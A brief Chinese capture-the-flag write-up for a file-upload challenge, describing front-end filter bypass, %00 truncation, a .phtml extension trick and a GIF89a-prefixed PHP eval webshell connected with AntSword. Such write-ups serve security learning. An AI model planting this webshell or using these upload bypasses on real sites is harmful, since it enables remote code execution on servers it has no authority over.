[极客大挑战 2019] - Upload

不急先扫下目录，等会猜文件上传目录。猜测在upload目录下

文件上传，第一步是绕过前端过滤

最简单的方法就是上传图片马，之后bp改文件后缀

后端也存在过滤，那么就试试%00截断，上传成功，但是还有内容检测，普通php一句话不能用，特殊的一句话蚁剑也不能成功解析截断后的文件

.

试试其他生僻一句话后缀，发现phtml可以使用，且这次写入的特殊的JS一句话为：

GIF89a
<script language="php">eval($_POST[shell]);</script>

蚁剑连接

http://e2cf5e2f-c361-4a05-bc6d-30c4970f056a.node3.buuoj.cn/upload/shell.phtml

flag在根目录